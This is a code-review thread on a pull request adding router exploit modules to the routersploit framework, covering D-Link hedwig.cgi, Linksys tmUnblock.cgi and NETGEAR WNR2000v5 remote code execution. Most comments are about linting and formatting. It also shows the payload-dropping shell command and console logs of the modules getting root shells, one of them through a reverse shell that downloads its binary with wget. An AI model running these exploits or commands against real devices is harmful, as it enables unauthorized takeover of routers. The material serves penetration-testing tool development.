### PR TITLE
D-LINK Hedwig CGI RCE && linksys tmUnblock CGI RCE && NETGEAR WNR2000v5 RCE

### PR DESCRIPTION
**Pull request by realoriginal**
Wrote an module for the DLINK Hedwig CGI Cookie Buffer Overflow that results in command execution

### CODE REVIEW

**Comment by jabedude** [comment]
Great work on this module!

Please run the run_linter.sh script and make the PEP8 fixes it tells you to.

**Comment by realoriginal** [comment]
Just ran linter, only thing it has a problem with is my indentation with tabs, strangely, even though the module runs fine.

**Comment by jabedude** [comment]
Correct, those tabs are causing the CI failure.

**Comment by realoriginal** [comment]
done :D

**Comment by realoriginal** [comment]
Strange..fixed indents...build still fails via travis cause i dont have the Python env header? didnt want to add it cause i saw none of your modules had it.

**Comment by jabedude** [comment]
So your indents are incorrect still...

> ./routersploit/modules/exploits/routers/dlink/multi_hedwig_cgi_rce.py:76:4: E111 indentation is not a multiple of four

Your indents need to be four spaces, like below:

```
    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            print_status("It is blind command injection, response is not available")
            shell(self, architecture="mipsel", method="echo", binary="echo", location="/var/tmp/")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

```

**Comment by realoriginal** [comment]
haha! yes sorry, never used any of this stuff before, bit new. fixing now

**Comment by realoriginal** [comment]
completed :)

File: routersploit/modules/exploits/routers/dlink/multi_hedwig_cgi_rce.py [hunk 1]
```diff
@@ -0,0 +1,97 @@
...
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation of DLINK Hedwig Buffer Overflow, allows command execution on devices without authentication. It overflows the cookie
+    uid value of hedwig.cgi.
+    """
+    __info__ = {
+        'name': 'D-LINK Hedwig CGI RCE',
+        'description': 'Module exploits an buffer overflow that leads to remote code execution',
+
+        'authors': 'Austin <github.com/realoriginal>', # routersploit module
```
Comment (jabedude) [inline routersploit/modules/exploits/routers/dlink/multi_hedwig_cgi_rce.py]: Change to:

```
'authors': ['Austin <github.com/realoriginal>'],  # routersploit module
```

**Comment by realoriginal** [comment]
Yup.so all good or?

**Comment by jabedude** [comment]
You did not make the changes. Before committing, please run `run_tests.sh` and `run_linter.sh`.

**Comment by realoriginal** [comment]
K, commited, run_tests.sh output for hedwig
```sh
======================================================================
FAIL: test_metadata_type (routersploit.test.test_modules.ModuleTest) routersploit.modules.exploits.routers.dlink.multi_hedwig_cgi_rce
----------------------------------------------------------------------
Traceback (most recent call last):
  File "/root/.gits/routersploit_pull/routersploit/routersploit/test/test_modules.py", line 37, in test_metadata_type
    self.assertIsSequence(self.module_metadata['authors'])
  File "/root/.gits/routersploit_pull/routersploit/routersploit/test/test_case.py", line 30, in assertIsSequence
    "'{}' is not a sequence".format(arg)
AssertionError: 'Austin <github.com/realoriginal>' is not a sequence
```

and run_linter.sh
```sh
./routersploit/modules/exploits/routers/dlink/multi_hedwig_cgi_rce.py:64:19: F821 undefined name 'raw_input'
```

extremely new to this, thanks for helping :D

**Comment by jabedude** [comment]
The test is failing because your author value needs to be a list, like so:

`'authors': ['Austin <github.com/realoriginal>'],  # routersploit module`

**Comment by realoriginal** [comment]
done

**Comment by realoriginal** [comment]
there we go, seems like no issues :D .

**Comment by 0BuRner** [comment]
Hehe good job dude after a bit struggle! ^^

**Comment by realoriginal** [comment]
:D thanks. I got a few more ill submit in a few days after i test them. Mostly on stuff that i saw you were looking for, as well as another Linksys exploit for command execution, this time though with actually reverse shell functionality xD. love this framework, may as well help.

I do have one question, as i will come back to this one to add rev shell fuctionality. My one issue is, the module, i noticed you cant change the operate from ; to &&. 

Atm, the final command for delivering the echo payload is 
```
chmod 777 /tmp/name; /tmp/name; rm /tmp/name
```

would it be possible to change the ```;``` to ```&&``` ?

**Comment by realoriginal** [comment]
Just wrote a rewrite with reverse shell functionality, but wont publish to master because i had to modify the shell.py file to get the payload execution to work with echo.

**Comment by realoriginal** [comment]
so hopefully this one is good xD

**Comment by lucyoa** [comment]
@realoriginal great contribution. We are redesigning shell and payloads mechanism. Hopefully we will finish it this weekend so we will be able to merge your module.

**Comment by realoriginal** [comment]
sounds good :).

**Comment by jabedude** [comment]
Good job! Welcome to routersploit!

**Comment by realoriginal** [comment]
:D glad to be hear. got a few more wish to contribute, but will wait till this one + the shell changes are done to submit them. gotta love rsf

**Comment by realoriginal** [comment]
Added two more modules for ya guys, tested 'em. ouput : 

# WNR2000v5 RCE: (TESTED ON FIRMWARE VERSION V1.0.0.34)
```
rsf > use exploits/routers/netgear/wnr2000v5_rce
rsf (NETGEAR WNR2000v5 RCE) > set target http://192.168.11.2
[+] {'target': 'http://192.168.11.2'}
rsf (NETGEAR WNR2000v5 RCE) > set username admin
[+] {'username': 'admin'}
rsf (NETGEAR WNR2000v5 RCE) > set password password
[+] {'password': 'password'}
rsf (NETGEAR WNR2000v5 RCE) > run
[*] Running module...
[+] Target may be vulnerable
[+] Successfully logged in! Retrieving timestamp...
[*] Timestamp retrieved : 86649584
[*] Starting telnetd on target...
[*] Please wait 10 seconds, shell should be avaiable
[*] Connecting to 192.168.11.2:23


BusyBox v1.4.2 (2015-04-22 16:16:13 CST) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

/ # :)
```

# Linksys tmUnblock.cgi RCE  ver (cant find firmware version....)

```
rsf > use exploits/routers/linksys/multi_eseries_tmunblock_cgi_rce
rsf (Linksys E-Series RCE) > set target http://192.168.11.2
[+] {'target': 'http://192.168.11.2'}
rsf (Linksys E-Series RCE) > check
[+] Target is vulnerable
rsf (Linksys E-Series RCE) > run
[*] Running module...
[+] Target is vulnerable
[*] This is Blind command injection. Type reverse_tcp <reverse ip> <port> to start a shell
cmd > reverse_tcp 192.168.11.33 2111
[*] Generating reverse shell binary
[*] Using wget method
[*] Using wget to download binary
[*] Setting up HTTP server
[*] Waiting for reverse shell...
[*] Connection from 192.168.11.2:41986
[+] Enjoy your shell
```

**Comment by realoriginal** [comment]
should I just close this PR?

**Comment by lucyoa** [comment]
Hi @realoriginal, sorry for the delay but we just merged new architecture for running payloads. Now it should be possible to basically configure everything from the module.

E.g with echo:
```
shell(self, architecture="mipsbe", method="echo", location="/tmp",
                 echo_options={"stream": "echo -ne {} >> {}", "max_length": 4},
                 exec_binary=["chmod 777 {0}; {0}; rm {0}"])
```

If you dont pass any options then it will use default values.

It would be perfect if you could:
1) Close this pr. 
2) Modify modules so they will work with new architecture
3) Make 3 new pull requests (separate for every exploit)

**Comment by realoriginal** [comment]
Yes can do.

**Pull request closed without merging**